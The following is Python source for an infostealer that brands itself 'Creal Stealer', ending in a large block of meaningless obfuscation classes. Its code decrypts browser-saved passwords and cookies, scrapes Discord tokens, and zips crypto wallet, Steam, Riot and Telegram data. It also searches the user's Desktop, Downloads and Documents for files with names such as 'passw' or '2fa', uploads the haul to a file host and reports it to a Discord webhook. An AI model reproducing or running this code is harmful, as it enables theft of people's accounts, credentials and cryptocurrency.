# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
# }
# # r = requests.post(hook, files=files)
# LoadRequests("POST", hook, files=files)
_
def wr1tef0rf1l3(data, name):
path = os.getenv("TEMP") + f"\cr{name}.txt"
with open(path, mode='w', encoding='utf-8') as f:
f.write(f"<--Creal STEALER BEST -->\n\n")
for line in data:
if line[0] != '':
f.write(f"{line}\n")
T0k3ns = ''
def getT0k3n(path, arg):
if not os.path.exists(path): return
path += arg
for file in os.listdir(path):
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", r"mfa\.[\w-]{80,95}"):
for t0k3n in re.findall(regex, line):
global T0k3ns
if ch1ckT4k1n(t0k3n):
if not t0k3n in T0k3ns:
# print(token)
T0k3ns += t0k3n
upl05dT4k31(t0k3n, path)
P4ssw = []
def getP4ssw(path, arg):
global P4ssw, P4sswCount
if not os.path.exists(path): return
pathC = path + arg + "/Login Data"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in paswWords: paswWords.append(old)
P4ssw.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {D3kryptV4lU3(row[2], master_key)}")
P4sswCount += 1
wr1tef0rf1l3(P4ssw, 'passw')
C00k13 = []
def getC00k13(path, arg):
global C00k13, CookiCount
if not os.path.exists(path): return
pathC = path + arg + "/Cookies"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in cookiWords: cookiWords.append(old)
C00k13.append(f"{row[0]} TRUE / FALSE 2597573456 {row[1]} {D3kryptV4lU3(row[2], master_key)}")
CookiCount += 1
wr1tef0rf1l3(C00k13, 'cook')
def G3tD1sc0rd(path, arg):
if not os.path.exists(f"{path}/Local State"): return
pathC = path + arg
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
# print(path, master_key)
for file in os.listdir(pathC):
# print(path, file)
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{pathC}\\{file}", errors="ignore").readlines() if x.strip()]:
for t0k3n in re.findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", line):
global T0k3ns
t0k3nDecoded = D3kryptV4lU3(b64decode(t0k3n.split('dQw4w9WgXcQ:')[1]), master_key)
if ch1ckT4k1n(t0k3nDecoded):
if not t0k3nDecoded in T0k3ns:
# print(token)
T0k3ns += t0k3nDecoded
# writeforfile(Tokens, 'tokens')
upl05dT4k31(t0k3nDecoded, path)
def GatherZips(paths1, paths2, paths3):
thttht = []
for patt in paths1:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]])
a.start()
thttht.append(a)
for patt in paths2:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[2], patt[1]])
a.start()
thttht.append(a)
a = threading.Thread(target=ZipTelegram, args=[paths3[0], paths3[2], paths3[1]])
a.start()
thttht.append(a)
for thread in thttht:
thread.join()
global WalletsZip, GamingZip, OtherZip
# print(WalletsZip, GamingZip, OtherZip)
wal, ga, ot = "",'',''
if not len(WalletsZip) == 0:
wal = ":coin: • Wallets\n"
for i in WalletsZip:
wal += f"└─ [{i[0]}]({i[1]})\n"
if not len(WalletsZip) == 0:
ga = ":video_game: • Gaming:\n"
for i in GamingZip:
ga += f"└─ [{i[0]}]({i[1]})\n"
if not len(OtherZip) == 0:
ot = ":tickets: • Apps\n"
for i in OtherZip:
ot += f"└─ [{i[0]}]({i[1]})\n"
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
data = {
"content": globalInfo(),
"embeds": [
{
"title": "Creal Zips",
"description": f"{wal}\n{ga}\n{ot}",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
def ZipTelegram(path, arg, procc):
global OtherZip
pathC = path
name = arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file and not "tdummy" in file and not "user_data" in file and not "webview" in file:
zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
#lnik = "https://google.com"
os.remove(f"{pathC}/{name}.zip")
OtherZip.append([arg, lnik])
def Z1pTh1ngs(path, arg, procc):
pathC = path
name = arg
global WalletsZip, GamingZip, OtherZip
# subprocess.Popen(f"taskkill /im {procc} /t /f", shell=True)
# os.system(f"taskkill /im {procc} /t /f")
if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Metamask_{browser}"
pathC = path + arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
if "Wallet" in arg or "NationsGlory" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"{browser}"
elif "Steam" in arg:
if not os.path.isfile(f"{pathC}/loginusers.vdf"): return
f = open(f"{pathC}/loginusers.vdf", "r+", encoding="utf8")
data = f.readlines()
# print(data)
found = False
for l in data:
if 'RememberPassword"\t\t"1"' in l:
found = True
if found == False: return
name = arg
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file: zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
#lnik = "https://google.com"
os.remove(f"{pathC}/{name}.zip")
if "Wallet" in arg or "eogaeaoehlef" in arg:
WalletsZip.append([name, lnik])
elif "NationsGlory" in name or "Steam" in name or "RiotCli" in name:
GamingZip.append([name, lnik])
else:
OtherZip.append([name, lnik])
def GatherAll():
' Default Path < 0 > ProcesName < 1 > Token < 2 > Password < 3 > Cookies < 4 > Extentions < 5 > '
browserPaths = [
[f"{roaming}/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ]
]
discordPaths = [
[f"{roaming}/Discord", "/Local Storage/leveldb"],
[f"{roaming}/Lightcord", "/Local Storage/leveldb"],
[f"{roaming}/discordcanary", "/Local Storage/leveldb"],
[f"{roaming}/discordptb", "/Local Storage/leveldb"],
]
PathsToZip = [
[f"{roaming}/atomic/Local Storage/leveldb", '"Atomic Wallet.exe"', "Wallet"],
[f"{roaming}/Exodus/exodus.wallet", "Exodus.exe", "Wallet"],
["C:\Program Files (x86)\Steam\config", "steam.exe", "Steam"],
[f"{roaming}/NationsGlory/Local Storage/leveldb", "NationsGlory.exe", "NationsGlory"],
[f"{local}/Riot Games/Riot Client/Data", "RiotClientServices.exe", "RiotClient"]
]
Telegram = [f"{roaming}/Telegram Desktop/tdata", 'telegram.exe', "Telegram"]
for patt in browserPaths:
a = threading.Thread(target=getT0k3n, args=[patt[0], patt[2]])
a.start()
Threadlist.append(a)
for patt in discordPaths:
a = threading.Thread(target=G3tD1sc0rd, args=[patt[0], patt[1]])
a.start()
Threadlist.append(a)
for patt in browserPaths:
a = threading.Thread(target=getP4ssw, args=[patt[0], patt[3]])
a.start()
Threadlist.append(a)
ThCokk = []
for patt in browserPaths:
a = threading.Thread(target=getC00k13, args=[patt[0], patt[4]])
a.start()
ThCokk.append(a)
threading.Thread(target=GatherZips, args=[browserPaths, PathsToZip, Telegram]).start()
for thread in ThCokk: thread.join()
DETECTED = TR6st(C00k13)
if DETECTED == True: return
for patt in browserPaths:
threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]]).start()
for patt in PathsToZip:
threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[2], patt[1]]).start()
threading.Thread(target=ZipTelegram, args=[Telegram[0], Telegram[2], Telegram[1]]).start()
for thread in Threadlist:
thread.join()
global upths
upths = []
for file in ["crpassw.txt", "crcook.txt"]:
# upload(os.getenv("TEMP") + "\\" + file)
upload(file.replace(".txt", ""), uploadToAnonfiles(os.getenv("TEMP") + "\\" + file))
def uploadToAnonfiles(path):
try:return requests.post(f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile', files={'file': open(path, 'rb')}).json()["data"]["downloadPage"]
except:return False
# def uploadToAnonfiles(path):s
# try:
# files = { "file": (path, open(path, mode='rb')) }
# upload = requests.post("https://transfer.sh/", files=files)
# url = upload.text
# return url
# except:
# return False
def KiwiFolder(pathF, keywords):
global KiwiFiles
maxfilesperdir = 7
i = 0
listOfFile = os.listdir(pathF)
ffound = []
for file in listOfFile:
if not os.path.isfile(pathF + "/" + file): return
i += 1
if i <= maxfilesperdir:
url = uploadToAnonfiles(pathF + "/" + file)
ffound.append([pathF + "/" + file, url])
else:
break
KiwiFiles.append(["folder", pathF + "/", ffound])
KiwiFiles = []
def KiwiFile(path, keywords):
global KiwiFiles
fifound = []
listOfFile = os.listdir(path)
for file in listOfFile:
for worf in keywords:
if worf in file.lower():
if os.path.isfile(path + "/" + file) and ".txt" in file:
fifound.append([path + "/" + file, uploadToAnonfiles(path + "/" + file)])
break
if os.path.isdir(path + "/" + file):
target = path + "/" + file
KiwiFolder(target, keywords)
break
KiwiFiles.append(["folder", path, fifound])
def Kiwi():
user = temp.split("\AppData")[0]
path2search = [
user + "/Desktop",
user + "/Downloads",
user + "/Documents"
]
key_wordsFolder = [
"account",
"acount",
"passw",
"secret",
"senhas",
"contas",
"backup",
"2fa",
"importante",
"privado",
"exodus",
"exposed",
"perder",
"amigos",
"empresa",
"trabalho",
"work",
"private",
"source",
"users",
"username",
"login",
"user",
"usuario",
"log"
]
key_wordsFiles = [
"passw",
"mdp",
"motdepasse",
"mot_de_passe",
"login",
"secret",
"account",
"acount",
"paypal",
"banque",
"account",
"metamask",
"wallet",
"crypto",
"exodus",
"discord",
"2fa",
"code",
"memo",
"compte",
"token",
"backup",
"secret",
"mom",
"family"
]
wikith = []
for patt in path2search:
kiwi = threading.Thread(target=KiwiFile, args=[patt, key_wordsFiles]);kiwi.start()
wikith.append(kiwi)
return wikith
global keyword, cookiWords, paswWords, CookiCount, P4sswCount, WalletsZip, GamingZip, OtherZip
keyword = [
'mail', '[coinbase](https://coinbase.com)', '[sellix](https://sellix.io)', '[gmail](https://gmail.com)', '[steam](https://steam.com)', '[discord](https://discord.com)', '[riotgames](https://riotgames.com)', '[youtube](https://youtube.com)', '[instagram](https://instagram.com)', '[tiktok](https://tiktok.com)', '[twitter](https://twitter.com)', '[facebook](https://facebook.com)', 'card', '[epicgames](https://epicgames.com)', '[spotify](https://spotify.com)', '[yahoo](https://yahoo.com)', '[roblox](https://roblox.com)', '[twitch](https://twitch.com)', '[minecraft](https://minecraft.net)', 'bank', '[paypal](https://paypal.com)', '[origin](https://origin.com)', '[amazon](https://amazon.com)', '[ebay](https://ebay.com)', '[aliexpress](https://aliexpress.com)', '[playstation](https://playstation.com)', '[hbo](https://hbo.com)', '[xbox](https://xbox.com)', 'buy', 'sell', '[binance](https://binance.com)', '[hotmail](https://hotmail.com)', '[outlook](https://outlook.com)', '[crunchyroll](https://crunchyroll.com)', '[telegram](https://telegram.com)', '[pornhub](https://pornhub.com)', '[disney](https://disney.com)', '[expressvpn](https://expressvpn.com)', 'crypto', '[uber](https://uber.com)', '[netflix](https://netflix.com)'
]
CookiCount, P4sswCount = 0, 0
cookiWords = []
paswWords = []
WalletsZip = [] # [Name, Link]
GamingZip = []
OtherZip = []
GatherAll()
DETECTED = TR6st(C00k13)
# DETECTED = False
if not DETECTED:
wikith = Kiwi()
for thread in wikith: thread.join()
time.sleep(0.2)
filetext = "\n"
for arg in KiwiFiles:
if len(arg[2]) != 0:
foldpath = arg[1]
foldlist = arg[2]
filetext += f"📁 {foldpath}\n"
for ffil in foldlist:
a = ffil[0].split("/")
fileanme = a[len(a)-1]
b = ffil[1]
filetext += f"└─:open_file_folder: [{fileanme}]({b})\n"
filetext += "\n"
upload("kiwi", filetext)
class UMuzEjUeXvllG:
def __init__(self):
self.__GmbYmdILLuYRlZim()
self.__NhiBgGJi()
self.__EOZkWGNvefQhdjkdSv()
self.__LEpwJFCrqe()
self.__RaxQsbUaiXFuosjLjFL()
self.__gFyMUBeclxAMSuLGFI()
self.__peuqNPJgSViqteJ()
self.__ZYLcqbHdYTIqqL()
self.__MgiXVFfX()
def __GmbYmdILLuYRlZim(self, UuRZkBenvdQaxpr, EhsaszgQ, WusaqAueWgoRuFJxREl, rTaQFK, ikgVdCv, CjYaFqqV):
return self.__EOZkWGNvefQhdjkdSv()
def __NhiBgGJi(self, CuBzwZqZVh, vrQntwSfuo, ZNLesUnrw):
return self.__EOZkWGNvefQhdjkdSv()
def __EOZkWGNvefQhdjkdSv(self, ruDEFEVIMPuljxbIum, IcZbAuTO, ZCpTMCgZXOvOlb, XVHYWuS, ROkgZ):
return self.__ZYLcqbHdYTIqqL()
def __LEpwJFCrqe(self, mBAvgegohAEQ, ZGIXDTrwFUgGewuTBXzh):
return self.__MgiXVFfX()
def __RaxQsbUaiXFuosjLjFL(self, MibIKA, JcQaeKrMlNwgyDHed, uIebkvmF):
return self.__NhiBgGJi()
def __gFyMUBeclxAMSuLGFI(self, MYUajyiy, BZVlJGwK, EBUTLJKOimGrKIz):
return self.__RaxQsbUaiXFuosjLjFL()
def __peuqNPJgSViqteJ(self, dfhmeiu, krzPWxIcOiiph, FQzPGDNGDVdCKv, mdahQWJOsQchfE, sSeXHRweF, JtssGUuPX, iczMCP):
return self.__EOZkWGNvefQhdjkdSv()
def __ZYLcqbHdYTIqqL(self, PFmMRmYOBVWmaYxGPGlA, zWfUDzjwPom, KqIDQiGd):
return self.__gFyMUBeclxAMSuLGFI()
def __MgiXVFfX(self, fnlLoUMWepkOH, novVDxupN, DERJFMepAMkw, srnJyEhmsJe):
return self.__peuqNPJgSViqteJ()
class MyyxEelpTrPksTrw:
def __init__(self):
self.__QkfRfCTqYThuUeydeFyD()
self.__DWJHRfjGqB()
self.__thtJrhVr()
self.__xkjEZmiSc()
self.__vcOiedwWgTvpEDCB()
self.__eieGIJsrcEe()
self.__OyxRiLwQvnfq()
self.__owWjslNAP()
self.__eXzXntNJSfHAwgaaZt()
self.__kQoUCzwslOWUqwmVvcD()
self.__VquWeGLaRnLufGRB()
self.__MgvalQPJJNksXtETN()
self.__GwpbtIFkrJrairDFH()
self.__EHdJSFvuFJFjZBMig()
def __QkfRfCTqYThuUeydeFyD(self, fgFbSWVpQckROBnTaSm, HMLrGyKOxlDSkMGVgpbD, QoZKxaSlDI, QsZdC, xqjzzvCiHMXGS):
return self.__eieGIJsrcEe()
def __DWJHRfjGqB(self, jNDlYztAuakaOymZBAsm):
return self.__OyxRiLwQvnfq()
def __thtJrhVr(self, kmsbrQU, zkWxzrSpAplFToQ, YAfmZNUcdUql, iUyJWbCtKz):
return self.__GwpbtIFkrJrairDFH()
def __xkjEZmiSc(self, bczsIBdiuHfSJGU, VUgMZdg, RHLWzJstniHqvDdxC, xPZEtsvLqpQqTLSvnE, eVGntuiaHHBkASB, qQpwvmQuAxSp):
return self.__GwpbtIFkrJrairDFH()
def __vcOiedwWgTvpEDCB(self, TnUAnEnDVHBiWwQWHtO, RCrhZNzXZjYoxHYSS, WYbyRC, YGpUbYFgSdVtbXTMwzz, hIcNxUH):
return self.__VquWeGLaRnLufGRB()
def __eieGIJsrcEe(self, SUUrwSYIwm):
return self.__eXzXntNJSfHAwgaaZt()
def __OyxRiLwQvnfq(self, UOAPNJpIPpYQvj, KitIKzpjf):
return self.__owWjslNAP()
def __owWjslNAP(self, akxyVB):
return self.__OyxRiLwQvnfq()
def __eXzXntNJSfHAwgaaZt(self, pERYNxddVfStT):
return self.__eXzXntNJSfHAwgaaZt()
def __kQoUCzwslOWUqwmVvcD(self, bTobxUgnChsLBBSOo, aKKNjTVfZeuiPomMXC, JrDOIwYiCsmXOAcXRqm, CfDhTQIehD, BaOFKHurHvmimzowgf, sRfEiqua):
return self.__eXzXntNJSfHAwgaaZt()
def __VquWeGLaRnLufGRB(self, uoyUKwYsH, vLbuxn, SwLOdODTIk, nphLBFUfRMhfJVHtqJ, jyQopQuK, GANyjBolniinXQuWR):
return self.__DWJHRfjGqB()
def __MgvalQPJJNksXtETN(self, sySbumy, IrmHfulbr, pcnHSAPUSULkJRTjeRe, MbCYjCHEXmD, bBjrjmglUddxjDi):
return self.__kQoUCzwslOWUqwmVvcD()
def __GwpbtIFkrJrairDFH(self, HVCmdhwWAm, JryuNN, TfYkNezZkdVmlYKSQFy):
return self.__MgvalQPJJNksXtETN()
def __EHdJSFvuFJFjZBMig(self, JzmxOGMpLfQWVQynasUD, jJymYd):
return self.__MgvalQPJJNksXtETN()
class SUDzAVSHlvezMiCkG:
def __init__(self):
self.__NUlixBAraOAiTiCcfo()
self.__UkWDpZqexgfGxqDsrRHu()
self.__VHuzhLYrJLzTsE()
self.__eSjsJpBozLq()
self.__hcjoCgdQlgIxpEI()
self.__JCKeABnFPGmNAg()
self.__RKnmCzHnKHnsfdi()
self.__iIvemkzwwCbe()
self.__mSiISaDz()
self.__uHoYRtNdXTMucwgXY()
self.__huRfFwwhAnCMEMCnsriV()
def __NUlixBAraOAiTiCcfo(self, IipDDmQz, eqOcokAUrURNdqkLbn, OnKKsBJC, swfMrZPfadnF, xBoAYJctnHHoDjF):
return self.__NUlixBAraOAiTiCcfo()
def __UkWDpZqexgfGxqDsrRHu(self, tOpzb, KWwrCDRmyKn, SJWvubPLPbYQuByQW, EuhRCXcgdLDay):
return self.__NUlixBAraOAiTiCcfo()
def __VHuzhLYrJLzTsE(self, YVfnXvFXZOfoA, yeUIGiuphLy, KgdoNlxpyixEC, WfUDdwnvZe, sCCDEIvuifAjdphi, OIOxsSXeCYFgzN, VPmyN):
return self.__mSiISaDz()
def __eSjsJpBozLq(self, RndfbKJaGvthemmvLD, vZgjJ, EBsgVHgOCvCH, SXGRJuPordhT, WUdDYbyPv, CxUsbDyw):
return self.__hcjoCgdQlgIxpEI()
def __hcjoCgdQlgIxpEI(self, wLXKgixbaXzqmcXGbv, VByysakms, nTJwCyWuiRViV, ssJiNd, aADBA):
return self.__NUlixBAraOAiTiCcfo()
def __JCKeABnFPGmNAg(self, ecCSydRR, GdVMayweSyk, hakOPIythRJzPcMadd, LieUSsEqksNIJMIqbxWe):
return self.__iIvemkzwwCbe()
def __RKnmCzHnKHnsfdi(self, FCgqSSgMjZCeJJy, HSNDm, KRwWaOdqJrsIluh, HvdRtlgJgY, StfeJIWtjZPDvQPSeT):
return self.__NUlixBAraOAiTiCcfo()
def __iIvemkzwwCbe(self, nJVgNoRCHHWTW, LnMUsWqEnLmQPbfYq, hPUyNqbkMAOY):
return self.__mSiISaDz()
def __mSiISaDz(self, osWhKyuPNqyYn):
return self.__uHoYRtNdXTMucwgXY()
def __uHoYRtNdXTMucwgXY(self, pCCewDhHOkOUxaIGy, XzBSE, EZJKhziqegvSSQm, CAsxyaJD):
return self.__iIvemkzwwCbe()
def __huRfFwwhAnCMEMCnsriV(self, dSBCMPLnWFZOYx, xGdkIuT, RirCezPEE, rsXHVLZiOrxYWSV):
return self.__NUlixBAraOAiTiCcfo()
class FmKDYOCurAxayEGs:
def __init__(self):
self.__IZqYixfMNAPOVeBDEGE()
self.__uBTxwbGCrIbGwo()
self.__gjAiAbgh()
self.__qjvfpzNMz()
self.__CGNnyyAigiHz()
self.__wQnXJhWLiUEmYlLxkoD()
self.__GUXtLxvoaRrkwaH()
self.__lyJffElHL()
self.__fBWJHKbGZohochQbmj()
self.__KBuTJzxqdmwNAfQIIh()
self.__oQHQyfQNCrNgVSwr()
self.__dJrEQByAzqasZLaI()
def __IZqYixfMNAPOVeBDEGE(self, OPaSLeMUAvuMtl, TXnTIcYvDtatDNUEK, SsjlPsAjKapEizW, rERhusuLutda, MFJnvLaKmPyeZTwFGWy, wOyWmkySje):
return self.__dJrEQByAzqasZLaI()
def __uBTxwbGCrIbGwo(self, UZgmgEOC, Hzfpfru, DMvxuw):
return self.__gjAiAbgh()
def __gjAiAbgh(self, enFzAxljUr, lILjaPClbcFn, MFUMWEkNzcCYL, QsfblUWnpMdYfcz):
return self.__IZqYixfMNAPOVeBDEGE()
def __qjvfpzNMz(self, mGevhsnzJ):
return self.__gjAiAbgh()
def __CGNnyyAigiHz(self, OCgUEqNWrfrMZWzcL, yNBjarbwSc):
return self.__lyJffElHL()
def __wQnXJhWLiUEmYlLxkoD(self, yTeHptqZ):
return self.__uBTxwbGCrIbGwo()
def __GUXtLxvoaRrkwaH(self, hbDctSFUdrMR, CPXrOhFPmosWW):
return self.__dJrEQByAzqasZLaI()
def __lyJffElHL(self, tPSeFPAd, NsTNfqNYbIiTiQsY):
return self.__KBuTJzxqdmwNAfQIIh()
def __fBWJHKbGZohochQbmj(self, OmRcMVtVEfqmv, abTkSVHmfFCmKZU, NJriA, pgsTW, KfOPYeclJaQqbsziSXRj, ORjqQeaKdohJQCNWfK, DjeUtQ):
return self.__GUXtLxvoaRrkwaH()
def __KBuTJzxqdmwNAfQIIh(self, pazUIEXmN, OynsnDdM):
return self.__lyJffElHL()
def __oQHQyfQNCrNgVSwr(self, Wkqfds, wyXNbYGzjYKbvM, coWMaYSsEqNrlMPG, ySWphCOzDV, gAUHQCGJbTiYbY, pLujfwiGvDVU):
return self.__lyJffElHL()
def __dJrEQByAzqasZLaI(self, BEOEcdEXkpf, KRIACHDU, oUBHEBXVKgWgpzK):
return self.__CGNnyyAigiHz()
class uvmeubayNZUaPD:
def __init__(self):
self.__UwEVyqambDDl()
self.__eujvuaPmnD()
self.__EZEODnidjgXIh()
self.__DdhFXDBKFiUbpNmbYWku()
self.__JQkAZvonUKCzsjroTFt()
self.__vVEpBWlTEHyPuFdx()
self.__tBZtwYMw()
self.__aHcMtIPK()
self.__fhmnLseJSuUveKJxF()
def __UwEVyqambDDl(self, EEjvuAzcbvcWEuLDTxR, nUjPlEA, PjeRqNGeroNiiGir, IpWjqcYfSODh):
return self.__aHcMtIPK()
def __eujvuaPmnD(self, xtOTFApXYXPHpheP, TjUHaBufdNIvCSycP, kiSdawOhBH):
return self.__EZEODnidjgXIh()
def __EZEODnidjgXIh(self, iMRDugrRdPV, lGVrwyRSbNGegexp, kPrFmCwByxNs, MqvXNdBCIEuMBYcbtzmb, RLNtjsVHABjDkg, vcflbAAcsAxqlM, cztxAjPjPvkZ):
return self.__DdhFXDBKFiUbpNmbYWku()
def __DdhFXDBKFiUbpNmbYWku(self, KlRyNtKzAauQwizJbx, mdGSsCQVbcowKgR):
return self.__EZEODnidjgXIh()
def __JQkAZvonUKCzsjroTFt(self, DcEaWYscfnXpoxPJx, wZrCVNVCQYWjdgg, lHSKf, xuctPljVtUvOxA, nZhZSst, GRSAKfJpnIUKKEYnSB):
return self.__vVEpBWlTEHyPuFdx()
def __vVEpBWlTEHyPuFdx(self, bHsuvtxEauX, hpSVlZWyN, WOzCli, XkSfdMlhoRqEanv, DCXogA):
return self.__EZEODnidjgXIh()
def __tBZtwYMw(self, uSNRcBZpCwrIWEbLbgO, xEvdDDtOlJEGpFliCL, bmvriOWfSOL, FHtwnmj, eMuirwKuiscMZZ, wQbshKkYveEWPqUIngWw):
return self.__EZEODnidjgXIh()
def __aHcMtIPK(self, toXJrvvGUwJOMsW, iQaCRSzYXlxC):
return self.__fhmnLseJSuUveKJxF()
def __fhmnLseJSuUveKJxF(self, giEOJzv, cMsqP, MhmaxVunfBmclUvbC, KunjIvs, XwXjt):
return self.__tBZtwYMw()
class JVQATIIfbsigLfSblXn:
def __init__(self):
self.__rDpzUJtc()
self.__dhDDpBdjtCQ()
self.__iKeifHhZA()
self.__PnpdzcywOHQcahZbODy()
self.__DDfYNJcyOgJbzRP()
def __rDpzUJtc(self, UvMUTnXKvoCvMhCrxYMx, MXvdzMjz, AxsoxRfgyFYSYGMxAPbi, ifofUeOJJSjMq, gmJQVERzsRvyUVFp, GLParCyxGA, oDRbT):
return self.__dhDDpBdjtCQ()
def __dhDDpBdjtCQ(self, pHzbQUWZyMGaRqdM, RJUBjSIVBGntqIDgBJ, vCsLAEeBnyLIEQPAC, itMYgGuYHEO, VRtfrnJc, FBbEHHzyN, ULYEfKE):
return self.__DDfYNJcyOgJbzRP()
def __iKeifHhZA(self, PFAvUVGyGzrDqKBjOG):
return self.__rDpzUJtc()
def __PnpdzcywOHQcahZbODy(self, dCAHdOdlonmDkG, GBQayAxFychCg, RntZGyHukEQzzpfeb, gmEVUtKufS, peWTJAIGgupMqETuYnH, OdoLJAKWQFSME, TdrVVcxngrzFPhrix):
return self.__dhDDpBdjtCQ()
def __DDfYNJcyOgJbzRP(self, oldBxioK, FVnHWjYThJiUje):
return self.__DDfYNJcyOgJbzRP()
class CwvnOmapDfcvH:
def __init__(self):
self.__cjkyDLBtbszNpTG()
self.__nonNLBqMwUBjTXEGxMa()
self.__TxOXcJBHDWA()
self.__igbKJbZbVhoN()
self.__VHSrZyXEgMjcUw()
self.__eMaWhHKln()
self.__ylNWQYZNuZsZ()
self.__insaaxCZcsCOspe()
self.__rZVbuviOTQfApqLB()
self.__pYSNhoINec()
def __cjkyDLBtbszNpTG(self, fAHNxmysHNpUPijPzOaJ, QmYQkwT, vyeoQECT):
return self.__insaaxCZcsCOspe()
def __nonNLBqMwUBjTXEGxMa(self, DsnQvivS, omUWyLeFhuu, cMMwrksCHawemXePgu, JwZwEiGhFJsChk, pfXLra, ZLxUm):
return self.__cjkyDLBtbszNpTG()
def __TxOXcJBHDWA(self, NdhdtLt, SHiSGmGC, jXAZcGyObZwCfIFrmB, TGaqgBzn):
return self.__insaaxCZcsCOspe()
def __igbKJbZbVhoN(self, voKmN, hwQUqpiAlYUqrgA, YZZkxrEcGKXS, jbyalStoTg, yLEfSzT):
return self.__insaaxCZcsCOspe()
def __VHSrZyXEgMjcUw(self, UaGpIxJOarnl, trYcl, DtSxhLSDeOCa, EFoUVpwNzjGfoDfN, wyuKqMAaPm, vAKPR):
return self.__igbKJbZbVhoN()
def __eMaWhHKln(self, aPAwnqOiPxrXKGakT, SqPKJZuFaAROdPVYg):
return self.__eMaWhHKln()
def __ylNWQYZNuZsZ(self, zMepdhWRZSdpbefucSPH, gBevWGycKZMAuffhdaR, edbiMQzzlPrzqIyw):
return self.__pYSNhoINec()
